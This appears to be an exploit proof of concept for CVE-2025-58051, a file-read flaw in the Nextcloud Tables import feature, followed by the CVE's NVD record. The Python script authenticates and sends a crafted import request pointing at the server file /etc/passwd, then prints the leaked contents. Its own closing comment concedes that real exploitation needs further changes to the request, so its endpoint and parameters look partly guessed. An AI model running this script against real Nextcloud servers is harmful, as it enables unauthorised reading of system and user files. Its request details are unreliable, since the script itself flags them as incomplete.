CVE-2025-58051

# CVE-2025-58051 PoC - Nextcloud Tables Arbitrary File Read via Import # Vulnerability: Information disclosure through table import functionality # Affected: Nextcloud Tables < 0.7.6, < 0.8.8, < 0.9.5 import requests # Configuration TARGET_URL = "https://target-nextcloud-instance.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" TARGET_FILE = "/etc/passwd" # File to read from server (must be parseable by PhpSpreadsheet) # Step 1: Authenticate to Nextcloud session = requests.Session() login_url = f"{TARGET_URL}/login" login_data = { "user": USERNAME, "password": PASSWORD } session.post(login_url, data=login_data) # Step 2: Get the Tables app endpoint and CSRF token # Navigate to the Tables app to establish session context tables_url = f"{TARGET_URL}/index.php/apps/tables/" response = session.get(tables_url) # Step 3: Exploit the import functionality # The import endpoint accepts a file path parameter # By specifying a server file path, we can read arbitrary files import_url = f"{TARGET_URL}/index.php/apps/tables/api/1/import" # Craft the import request with the target file path import_data = { "path": TARGET_FILE, # Path traversal - point to server file "format": "auto" # Let PhpSpreadsheet auto-detect format } # Alternative: Use multipart form data with file upload files = { "file": ("import.xlsx", open("/dev/null", "rb"), "application/octet-stream") } # Send the import request response = session.post(import_url, data=import_data, files=files) # Step 4: Parse the response to extract leaked file content if response.status_code == 200: print("[+] File content leaked successfully:") print(response.json()) else: print(f"[-] Request failed with status: {response.status_code}") print(response.text) # Note: The actual exploitation involves modifying the import request # to reference server-side file paths instead of uploaded files. # When PhpSpreadsheet parses a supported file format, its contents # are returned as table data, effectively leaking the file content.

{"cve": {"id": "CVE-2025-58051", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:34.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Tables allows you to create your own tables with individual columns. Prior 0.7.6, 0.8.8, and 0.9.5, when importing a table, a user was able to specify files on the server and when their format is supported by the used PhpSpreadsheet library they would be included and their content leaked to the user. It is recommended that the Nextcloud Tables app is upgraded to 0.7.6, 0.8.8 or 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-841"}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wpp5-4w35-pxq6", "source": "[email protected]"}, {"url": "https://github.com/nextcloud/tables/pull/1936", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3249624", "source": "[email protected]"}]}}